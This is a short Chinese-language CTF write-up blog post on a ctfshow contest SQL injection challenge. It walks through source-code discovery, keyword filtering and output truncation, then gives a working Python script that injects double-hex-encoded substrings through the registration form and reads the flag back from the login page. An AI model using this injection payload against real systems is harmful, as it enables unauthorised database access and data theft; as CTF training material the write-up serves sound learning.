ctfshow内部赛

2020-02-27

字数统计: 421字 | 阅读时长≈ 1分

ctfshow内部赛

最近想多刷一些题，就先从ctfshow的题目下手吧。

文章目录

签到

蓝瘦

出题人不想跟你说话.jpg

一览无余

登录就有flag

签退

签到

前言

一道sql注入题目，只能说自己还有很多注入的姿势还没掌握。

后来查资料看到了这题类似[网鼎杯 2018 unfinish]

writeup

进入环境用dirsearch扫了一下，发现有login.php、register.php、www.zip、user.php

就把源码下载了下来

源码中对很多关键词都进行了过滤

user.php：

可以看到对用户名是否数字进行了判断，并且对长度进行了截取，会在返回值中返回username，所以我们就可以利用username进行回带值，注入点是在register.php传入的username中。

看一些sql语句

如果用了hex

但是还有个问题：

可以发现flag在hex编码之后被截断了

这个题要求的是纯数字，所以可以进行两次hex编码

由于前面对username回带的长度进行了截取，所以我们只能一次十位回带flag。

payload

import requests
import re
url1 = "http://3c7fe459-38fe-472f-90e2-eb144496bd2c.chall.ctf.show:8080/register.php"
url2 = "http://3c7fe459-38fe-472f-90e2-eb144496bd2c.chall.ctf.show:8080/login.php"
flag=''
for i in range(1,50):
    payload="hex(hex(substr((select/**/flag/**/from/**/flag)from/**/"+str(i)+"/**/for/**/1))),/*"
    # print(payload)
    s=requests.session()
    data1={
        'e':str(i+30)+"',username="+payload,
        'u':"*/#",
        'p':i+30
        }
    print(data1['e'])
    r1 = s.post(url1,data=data1)  
    data2={
        'e':i+30,
        'p':i+30
        }
    r2=s.post(url2,data=data2)
    t =r2.text
    real = re.findall("Hello (.*?),",t)[0]
    flag+=real
    print(flag)

本文作者： y0lo
本文链接： http://example.com/2020/02/27/ctfshow内部赛/
版权声明： 本博客所有文章除特别声明外，均采用 MIT 许可协议。转载请注明出处！